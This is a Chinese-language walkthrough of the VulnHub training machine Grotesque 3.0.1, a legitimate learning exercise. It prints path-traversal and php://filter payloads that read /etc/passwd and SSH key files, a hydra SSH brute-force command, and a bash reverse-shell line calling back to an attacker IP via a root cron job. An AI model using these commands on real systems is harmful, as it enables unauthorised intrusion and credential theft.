vulnhub靶場之GROTESQUE: 3.0.1

upfine發表於2022-12-24

準備:

攻擊機:虛擬機器kali、本機win10。

靶機:Grotesque: 3.0.1,下載地址:https://download.vulnhub.com/grotesque/grotesque3.zip,下載後直接vbox開啟即可。

知識點:ffuf引數爆破、定時任務、445埠利用、smbclient使用。 

vulnhub靶場之GROTESQUE: 3.0.1

資訊收集:

透過nmap掃描下網段內的存活主機地址,確定下靶機的地址:nmap -sn 172.20.10.0/24,獲得靶機地址:172.20.10.4。

vulnhub靶場之GROTESQUE: 3.0.1

掃描下埠對應的服務:nmap -T4 -sV -p- -A 172.20.10.4,顯示開放了22、80埠,開啟了ssh、http服務

vulnhub靶場之GROTESQUE: 3.0.1

目錄掃描:

使用dirmap進行目錄掃描,發現atlasg.jpg圖片,emmmm,訪問80埠的時候也能直接檢視到該圖片。

vulnhub靶場之GROTESQUE: 3.0.1

檢視該圖片利用steghide嘗試獲取隱藏資訊,但是獲取失敗,後來發現一個提示資訊:m、d和五個x,應該是告訴我們和md5有關。

vulnhub靶場之GROTESQUE: 3.0.1

根據提示生成一個md5字典,這裡我們將/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt字典進行md5加密,命令:for i in $(cat directory-list-lowercase-2.3-medium.txt); do echo $i | md5sum >> dirmd5.txt; done。記得替換裡面的橫線和空格。然後使用gobuster進行目錄掃描,發現:/f66b22bf020334b04c7d0d3eb5010391.php。

vulnhub靶場之GROTESQUE: 3.0.1

引數名爆破:

訪問:http://172.20.10.4/f66b22bf020334b04c7d0d3eb5010391.php無任何回顯資訊,原始碼資訊中也無任何資訊。因此嘗試使用ffuf進行引數爆破,命令:fuzf -f -u 'http://172.20.10.4/f66b22bf020334b04c7d0d3eb5010391.php?FUZZ=../../../../../../etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/common.txt,但是未掃描出來,然後更換字典,命令:ffuf -u 'http://172.20.10.4/f66b22bf020334b04c7d0d3eb5010391.php?FUZZ=../../../../../../etc/passwd' -w /usr/share/wordlists/dirb/big.txt,發現了引數名:purpose。

vulnhub靶場之GROTESQUE: 3.0.1

爆破ssh密碼:

讀取/etc/passwd檔案,發現賬戶名:freddie。

vulnhub靶場之GROTESQUE: 3.0.1

使用檔案包含漏洞讀取下ssh私匙和公匙均讀取失敗,命令:http://172.20.10.4/f66b22bf020334b04c7d0d3eb5010391.php?purpose=php://filter/read=convert.base64-encode/resource=/home/freddie/.ssh/id_rsa和http://172.20.10.4/f66b22bf020334b04c7d0d3eb5010391.php?purpose=php://filter/read=convert.base64-encode/resource=/home/freddie/.ssh/id_rsa.pub,然後嘗試下使用md5字典爆破下ssh密碼,命令:hydra -l freddie -P dirmd5.txt ssh://172.20.10.4,成功獲得freddie賬戶的ssh登入密碼:61a4e3e60c063d1e472dd780f64e6cad。

vulnhub靶場之GROTESQUE: 3.0.1

獲取shell:

使用獲得賬戶名和密碼:freddie/61a4e3e60c063d1e472dd780f64e6cad進行ssh登入,命令:ssh freddie@172.20.10.4,在freddie使用者下發現user.txt檔案,讀取該檔案成功獲取到flag值。

vulnhub靶場之GROTESQUE: 3.0.1

提權:

檢視下當前賬戶是否存在可以使用的特權命令,sudo -l,顯示不存在。

vulnhub靶場之GROTESQUE: 3.0.1

透過:find / -perm -4000 -type f 2>/dev/null來查詢下是否存在可疑檔案,但是未發現可利用的漏洞。

vulnhub靶場之GROTESQUE: 3.0.1

檢視下當前裝置開放的埠資訊,命令:ss -nutl,發現了445埠。

vulnhub靶場之GROTESQUE: 3.0.1

在kali使用enum4linux 172.20.10.4和smbclient -L 172.20.10.4進行資訊收集均失敗,但是在靶機中smbclient -L 172.20.10.4執行成功,獲得一個目錄:grotesque。

vulnhub靶場之GROTESQUE: 3.0.1

進入該目錄檢視目錄資訊,命令:smbclient //127.0.0.1/grotesque,發現不存在檔案資訊。

vulnhub靶場之GROTESQUE: 3.0.1

下載pspy64檔案並透過http服務上傳到靶機,在靶機執行監控靶機的執行程式,發現靶機中每一分鐘會一root許可權執行smbshare目錄下的檔案。

vulnhub靶場之GROTESQUE: 3.0.1

vulnhub靶場之GROTESQUE: 3.0.1

在靶機中寫一個反彈shell的指令碼,內容:#!/bin/bash   sh -i >& /dev/tcp/172.20.10.7/6688 0>&1。

vulnhub靶場之GROTESQUE: 3.0.1

利用剛才發現的共享資料夾:grotesque,將反彈shell指令碼上傳到smbshare目錄下,然後在kali端開啟對6688埠的監聽,成功獲得反彈的shell並在root目錄下讀取到flag值。

vulnhub靶場之GROTESQUE: 3.0.1

vulnhub靶場之GROTESQUE: 3.0.1

相關文章